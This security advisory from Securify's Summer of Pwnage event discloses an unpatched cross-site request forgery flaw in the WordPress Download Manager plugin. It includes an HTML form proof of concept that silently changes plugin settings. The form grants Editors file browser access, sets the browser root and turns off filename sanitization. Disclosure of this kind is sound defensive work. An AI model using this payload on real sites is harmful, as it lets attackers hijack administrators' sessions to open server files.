Security Bughunt

2017 - August - Amsterdam

2017 Target - IoT

Burak Kelebek - Securify, March 2017

Cross-Site Request Forgery in WordPress Download Manager Plugin


A Cross-Site Request Forgery vulnerability has been found in the WordPress Download Manager Plugin. By using this vulnerability an attacker can change confidential settings of the plugin.


For feedback or questions about this advisory mail us at sumofpwn at

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.



Tested versions

This issue was successfully tested on WordPress Download Manager version 2.8.99.


There is currently no fix available.


WordPress Download Manager is a Files / Documents Management Plugin and Complete e-Commerce Solution for selling digital products. WordPress Download Manager plugin will help you to manage, track, control file downloads & sell digital products easily from your WordPress site. Use Password Protection, User Roles Protection to control access to your files. And simply setup prices when you need to sell the digital item. User can directly download free items and when item has a price user will have to go through cart & checkout. It has easiest checkout option to give the user better experience in purchasing an item and which always increase the probability of successful completion of an order. As rather than trying to convince customer to buy something, it would be more helpful to think of a cart optimization as an action to remove barrier to that goal.

It was discovered that WordPress Download Manager is vulnerable to Cross-Site Request Forgery.


The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below.

Proof of concept

The proof of concept below gives file browser access to a user with Editor privileges:

      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="task" value="wdm_save_settings"/>
         <input type="hidden" name="action" value="wdm_settings"/>
         <input type="hidden" name="section" value="basic"/>
         <input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>
         <input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a>&#10;"/>
         <input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>
         <input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>
         <input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>
         <input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
         <input type="hidden" name="__wpdm_download_speed" value="4096"/>
         <input type="hidden" name="__wpdm_download_resume" value="1"/>
         <input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
         <input type="hidden" name="__wpdm_open_in_browser" value="0"/>
         <input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
         <input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
         <input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
         <input type="hidden" name="__wpdm_login_url" value=""/>
         <input type="hidden" name="__wpdm_register_url" value=""/>
         <input type="hidden" name="__wpdm_user_dashboard" value=""/>
         <input type="submit"/>